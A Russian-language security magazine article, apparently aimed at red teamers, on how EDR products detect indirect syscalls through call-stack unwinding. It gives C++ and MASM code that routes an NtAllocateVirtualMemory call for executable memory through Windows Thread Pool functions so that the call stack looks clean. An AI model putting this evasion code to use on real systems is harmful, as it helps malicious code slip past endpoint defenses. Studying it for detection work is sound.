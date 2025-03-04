Все чаще сис­темы EDR ста­ли при­бегать к такой могучей тех­нике, как трас­сиров­ка сте­ка вызовов, что­бы обна­ружи­вать деятель­ность злов­редных при­ложе­ний и пор­тить жизнь ред­тимерам. В этой статье я рас­ска­жу, как работа­ет этот метод, а потом поп­робу­ем сыг­рать в прят­ки с EDR и выз­вать NTAPI так, что­бы даже рас­крут­ка сте­ка не обна­ружи­ла под­воха.

warning Статья име­ет озна­коми­тель­ный харак­тер и пред­назна­чена для спе­циалис­тов по безопас­ности, про­водя­щих тес­тирова­ние в рам­ках кон­трак­та. Автор и редак­ция не несут ответс­твен­ности за любой вред, при­чинен­ный с при­мене­нием изло­жен­ной информа­ции. Рас­простра­нение вре­донос­ных прог­рамм, наруше­ние работы сис­тем и наруше­ние тай­ны перепис­ки прес­леду­ются по закону.

Как устроены WinAPI Indirect Calls

За­чем изоб­ретать что‑то новое, если есть такая тех­ника, как Indirect Calls для вызовов WinAPI? У нее есть свои силь­ные сто­роны, она прос­та в реали­зации и хорошо докумен­тирова­на. В двух сло­вах напом­ню, в чем ее суть.

Indirect Syscalls вызыва­ет NTAPI не нап­рямую через ntdll. dll , а через собс­твен­ный код, который эму­лиру­ет вызов фун­кции NTAPI: фор­миру­ется стек аргу­мен­тов, в eax заносит­ся номер сис­темно­го сер­виса для его вызова, далее выпол­няет­ся переход по адре­су инс­трук­ции syscall в самой ntdll. dll . Вот условный код:

// Ранее сформирован стек аргументов, далее сам вызов WinAPI из ntdll. dll mov r10, rcx mov eax, < syscall_ number> jmp < address_ of_ syscall_ instruction_ in_ ntdll>

Со сто­роны выг­лядит хорошо, и это работа­ло, пока EDR не научи­лись исполь­зовать трас­сиров­ку событий ETW для рас­крут­ки сис­темно­го сте­ка вызовов. Все дело в том, что тех­ника Indirect Syscalls поз­воля­ет избе­жать детек­тирова­ния на уров­не поль­зователь­ско­го режима, но оставля­ет сле­ды в сте­ке вызовов. EDR может ана­лизи­ровать стек, рас­кру­чивая его, и обна­ружи­вать эти ано­малии.

Стек, фреймы и EDR

Для даль­нейше­го понима­ния при­дет­ся нем­ного пог­рузить­ся в мат­часть и понять, как фор­миру­ются и работа­ют сте­ковые фрей­мы. Сте­ковый фрейм (или кадр сте­ка) — это область памяти в сте­ке, выделя­емая для выпол­нения каж­дой фун­кции в прог­рамме. Он содер­жит такие дан­ные, как парамет­ры фун­кции, локаль­ные перемен­ные, зна­чения регис­тров, адрес воз­вра­та. Прос­той при­мер кода:

void func1 ( ) { int x = 10 ; func2 ( x ) ; .. . .. . } void func2 ( int y ) { int z = y + 5 ; }

При вызове func2( x) будет сфор­мирован фрейм:

RSP — перемен­ная z ;

— перемен­ная ; RBP — базовый ука­затель пре­дыду­щего фрей­ма;

— базовый ука­затель пре­дыду­щего фрей­ма; RBP + 8 — ука­затель на сле­дующую инс­трук­цию в func1( ) (адрес воз­вра­та);

— ука­затель на сле­дующую инс­трук­цию в (адрес воз­вра­та); RBP + 16 — параметр фун­кции func2 .

Про­дол­жение статьи дос­тупно толь­ко прод­писчи­кам

Итак, ста­ло ясно, что сте­ковые фрей­мы фор­миру­ются при вызове каж­дой фун­кции и содер­жат мас­су полез­ной информа­ции, в том чис­ле ука­затель на пре­дыду­щий фрейм (счи­тай, фун­кцию). Имен­но так EDR и раз­ворачи­вают поток управле­ния, если замеча­ют подоз­ритель­ное поведе­ние в сис­теме. Как ты понима­ешь, про­тив этой тех­ники обна­руже­ния не спа­сут популяр­ные методы обфуска­ции вызовов WinAPI, но мы поп­робу­ем под­делать фрейм, что­бы обма­нуть EDR.

info Event Tracing for Windows (ETW) — это тех­нология, встро­енная в Windows, которая поз­воля­ет собирать и записы­вать дан­ные о событи­ях из раз­личных сис­темных ком­понен­тов и при­ложе­ний. ETW пре­дос­тавля­ет эффектив­ные средс­тва для телемет­рии, вклю­чая сбор информа­ции о сте­ке вызовов, что осо­бен­но полез­но для диаг­ности­ки, монито­рин­га про­изво­дитель­нос­ти и ана­лиза безопас­ности.

Как EDR наблюдает за стеком

Все дело в том, что EDR зна­ет, как дол­жен выг­лядеть стек при той или иной ситу­ации, и, если в его струк­туре наб­люда­ется откло­нение от нор­мы, сра­баты­вает алерт. Нап­ример, EDR про­веря­ет:

от­куда был выпол­нен переход к syscall . Если переход был выпол­нен из реги­она памяти, который не при­над­лежит ntdll. dll (нап­ример, куча или выделен­ная память), это счи­тает­ся ано­мали­ей;

. Если переход был выпол­нен из реги­она памяти, который не при­над­лежит (нап­ример, куча или выделен­ная память), это счи­тает­ся ано­мали­ей; пра­ва дос­тупа к реги­ону памяти, из которо­го был выпол­нен переход. Если реги­он име­ет пра­ва PAGE_EXECUTE_READWRITE , это может быть приз­наком кос­венно­го вызова или шелл‑кода;

, это может быть приз­наком кос­венно­го вызова или шелл‑кода; ку­да вер­нется выпол­нение пос­ле завер­шения сис­темно­го вызова. Если воз­вра­щаемый адрес ука­зыва­ет на поль­зователь­скую память, это тоже счи­тает­ся ано­мали­ей.

Те­перь пос­мотрим, как выг­лядит пра­виль­ная с точ­ки зре­ния EDR струк­тура сте­ка вызовов при алло­кации памяти из поль­зователь­ско­го при­ложе­ния:

0x00007ffb`12345678 ntdll!NtAllocateVirtualMemory 0x00007ffb`12345555 kernel32!VirtualAlloc 0x00007ffb`12345432 MyProgram!Main

Здесь при­ложе­ние MyProgram из фун­кции main выделя­ет память при помощи VirtualAlloc , которая вызыва­ет NTAPI NtAllocateVirtualMemory из ntdll. dll . Что про­исхо­дит, если выпол­няет­ся руч­ной вызов NTAPI (собс­твен­норуч­ное фор­мирова­ние сте­ка и регис­тров для вызова)? Прог­рамма выпол­няет кос­венный вызов:

mov r10, rcx // Номер NtAllocateVirtualMemory в сервисной таблице mov eax, 0x18 // Вызов сискола по адресу в ntdll. dll jmp 0x00007ffb`12345678

EDR зах­ватыва­ет стек вызовов:

0x00007ffb`12345678 ntdll!NtAllocateVirtualMemory // Адрес в пользовательской памяти ( где мы формировали аргументы), откуда был выполнен переход к сисколу внутри ntdll. dll 0x000001a3`45678901 [ RX Region] 0x00007ffb`12345432 MyProgram!Main

Мы видим, что воз­вра­щаемый адрес ука­зыва­ет на ntdll. dll , но стек начина­ется из поль­зователь­ской памяти, — алерт!

Ока­зыва­ется, кос­венные вызовы не так слож­но обна­ружить, как мог­ло казать­ся. Что ж, будем при­думы­вать лекарс­тво!

Запускаем NTAPI без следов

В одной из пре­дыду­щих ста­тей я рас­ска­зывал об инъ­екции кода методом PoolParty, который исполь­зовал механизм Windows Thread Pools. Здесь я покажу вызов NTAPI при помощи того же механиз­ма. Надо ска­зать, что это не единс­твен­ный механизм Windows, при помощи которо­го мож­но прок­сировать вызовы NTAPI, но один из более‑менее изу­чен­ных.

Фун­кции TpAllocWork , TpPostWork и TpReleaseWork , которые нам инте­рес­ны, исполь­зуют­ся для управле­ния задача­ми в Windows Thread Pools. Эти фун­кции поз­воля­ют соз­давать, запус­кать и осво­бож­дать задачи, которые обра­баты­вают­ся пулом потоков Windows, что облегча­ет парал­лель­ное выпол­нение кода. Разуме­ется, эти фун­кции пол­ностью недоку­мен­тирован­ные и находят­ся в ntdll. dll . Их мы и исполь­зуем для вызова NTAPI в обход монито­рин­га сте­ка. Для это­го пос­мотрим на про­тоти­пы.

Фун­кция TpAllocWork соз­дает новое задание, которое может быть выпол­нено пулом потоков. При соз­дании задания нуж­но ука­зать кол­бэк‑фун­кцию, которая будет выпол­нена, ког­да пул потоков нач­нет обра­бот­ку это­го задания.

PTP_WORK TpAllocWork ( PTP_WORK_CALLBACK WorkCallback , PVOID Context , PTP_CALLBACK_ENVIRON CallbackEnviron ) ;

Па­рамет­ры:

WorkCallback — ука­затель на фун­кцию обратно­го вызова, которая будет выз­вана для выпол­нения задания;

— ука­затель на фун­кцию обратно­го вызова, которая будет выз­вана для выпол­нения задания; Context — ука­затель на поль­зователь­ский кон­текст, который переда­ется в фун­кцию обратно­го вызова;

— ука­затель на поль­зователь­ский кон­текст, который переда­ется в фун­кцию обратно­го вызова; CallbackEnviron — ука­затель на струк­туру TP_CALLBACK_ENVIRON , которая нас­тра­ивает окру­жение для задания. Этот параметр может быть nullptr , что­бы исполь­зовать сре­ду по умол­чанию.

От­работав, TpAllocWork воз­вра­щает ука­затель на PTP_WORK (объ­ект работы пула потоков) при успе­хе или nullptr при ошиб­ке.

Да­лее идет фун­кция TpPostWork , которая ста­вит соз­данное задание в оче­редь пула потоков для выпол­нения. Эта фун­кция акти­виру­ет выпол­нение задания, соз­данно­го с помощью TpAllocWork .

void TpPostWork ( PTP_WORK Work ) ;

Единс­твен­ный параметр PTP_WORK Work — ука­затель на рабочий объ­ект пула потоков, который был соз­дан с помощью TpAllocWork .

Пос­ледняя фун­кция, TpReleaseWork , осво­бож­дает объ­ект задания. Она необ­ходима, что­бы осво­бодить ресур­сы, выделен­ные для задания, соз­данно­го с помощью TpAllocWork . Если задание находит­ся в оче­реди или выпол­няет­ся, вызов TpReleaseWork дож­дется завер­шения задания, а затем осво­бодит ресур­сы.

void TpReleaseWork ( PTP_WORK Work ) ;

Как и в пре­дыду­щей фун­кции, здесь все­го один аргу­мент — PTP_WORK Work .

Вы­зов API с при­мене­нием этих фун­кций будет фор­мировать­ся таким обра­зом:

typedef NTSTATUS ( NTAPI * ALLOCWORK ) ( PTP_WORK * ptpWork , PTP_WORK_CALLBACK ptpCallback , PVOID arg , PTP_CALLBACK_ENVIRON CallbackEnv ) ; typedef VOID ( NTAPI * POSTWORK ) ( PTP_WORK ) ; typedef VOID ( NTAPI * RELEASEWORK ) ( PTP_WORK ) ; .. . VOID MakeCall ( PTP_WORK_CALLBACK work_callback , PVOID args ) { PTP_WORK ptpWork = NULL ; ( ( TPALLOCWORK ) ptr_TpAllocWork ) ( & ptpWork , ( PTP_WORK_CALLBACK ) work_callback , args , NULL ) ; ( ( TPPOSTWORK ) ptr_TpPostWork ) ( ptpWork ) ; ( ( TPRELEASEWORK ) ptr_TpReleaseWork ) ( ptpWork ) ; WaitForSingleObject ( ( HANDLE ) - 1 , 0x1000 ) ; }

Здесь PTP_WORK_CALLBACK work_callback — ука­затель на ассем­блер­ную встав­ку, которая и сде­лает сам вызов NTAPI, а PVOID args — это пакет аргу­мен­тов вызыва­емой фун­кции.

Па­кет аргу­мен­тов фор­миру­ется в виде обыч­ной струк­туры, содер­жащей парамет­ры фун­кции. Неболь­шое исклю­чение — пер­вым аргу­мен­том в струк­туре будет ука­затель на NtAllocateVirtualMemory . На нашем при­мере это про­исхо­дит таким обра­зом:

// Структура аргументов typedef struct _ZWALLOCATEVIRTUALMEMORY_ARG { // Первый аргумент структуры — указатель на функцию NtAllocateVirtualMemory UINT_PTR pNtAllocateVirtualMemory ; HANDLE ProcessHandle ; PVOID * BaseAddress ; ULONG_PTR ZeroBits ; PSIZE_T RegionSize ; ULONG AllocationType ; ULONG Protect ; } ZWALLOCATEVIRTUALMEMORY_ARG , * PZWALLOCATEVIRTUALMEMORY_ARG ; .. . PVOID NtAllocateVirtualMemory ( HANDLE hProcess ) { PVOID alloc_addr = NULL ; SIZE_T alloc_size = 0x1000 ; ZWALLOCATEVIRTUALMEMORY_ARG AllocateVirtualMemory_Arg = { 0 } ; // Здесь получили указатель на NtAllocateVirtualMemory AllocateVirtualMemory_Arg . pNtAllocateVirtualMemory = ( UINT_PTR ) GetProcAddress ( GetModuleHandleA ( "ntdll" ) , "NtAllocateVirtualMemory" ) ; AllocateVirtualMemory_Arg . ProcessHandle = hProcess ; AllocateVirtualMemory_Arg . BaseAddress = & alloc_addr ; AllocateVirtualMemory_Arg . ZeroBits = 0 ; AllocateVirtualMemory_Arg . RegionSize = & alloc_size ; AllocateVirtualMemory_Arg . AllocationType = MEM_RESERVE ; AllocateVirtualMemory_Arg . Protect = PAGE_EXECUTE_READWRITE ; MakeCall ( ( PTP_WORK_CALLBACK ) NtAllocateVirtualMemoryCallback , & AllocateVirtualMemory_Arg ) ; return alloc_addr ; }

Сам work_callback написан на MASM, и его задача — раз­бирать аргу­мен­ты, фор­мировать стек для NtAllocateVirtualMemory и делать сам вызов фун­кции. В x64 аргу­мен­ты в фун­кцию переда­ются так: пер­вые четыре аргу­мен­та через регис­тры rcx , rdx , r8 , r9 , а если аргу­мен­тов боль­ше, то сле­дующие переда­ются через стек с при­мене­нием регис­тра rsp .

NtAllocateVirtualMemoryCallback proc mov rbx , rdx ; Возьмем адрес NTAPI из структуры mov rax , [ rbx ] ; Получим все оставшиеся ее аргументы mov rcx , [ rbx + 8 ] mov rdx , [ rbx + 10h ] xor r8 , r8 mov r9 , [ rbx + 18h ] mov r10 , [ rbx + 20h ] mov [ rsp + 30h ] , r10 mov r10 , 1000h mov [ rsp + 28h ] , r10 ; Сам вызов NtAllocateVirtualMemory NtAllocateVirtualMemoryCallback endp jmp rax

Не забыва­ем, что из кода на C++ фун­кцию ассем­бле­ра мож­но выз­вать, объ­явив ее при помощи extern в одном из заголов­ков.

extern "C" VOID CALLBACK NtAllocateVirtualMemoryCallback ( PTP_CALLBACK_INSTANCE Instance , PVOID Context , PTP_WORK Work ) ;

Пос­ле это­го мож­но прос­то выз­вать NtAllocateVirtualMemory( HANDLE hProcess) , и стек будет выг­лядеть пол­ностью чис­тым, потому что вызов фун­кции возь­мет на себя сам механизм Windows Thread Pools.

Выводы

Се­год­ня ты узнал, что такое рас­крут­ка сте­ка, как она помога­ет обна­ружи­вать выпол­нение зло­наме­рен­ного кода и как мож­но этот механизм обна­руже­ния запутать. Что при­меча­тель­но, в этом слу­чае сама Windows помог­ла нам спра­вить­ся с обна­руже­нием. Мож­но ли этот метод счи­тать сереб­ряной пулей? Конеч­но, нет! Как толь­ко EDR ста­нут сле­дить за кол­бэками в инте­ресу­ющих ее фун­кци­ях, эта тай­на рас­кро­ется. Но, как и всег­да, борь­ба щита и меча про­дол­жает­ся!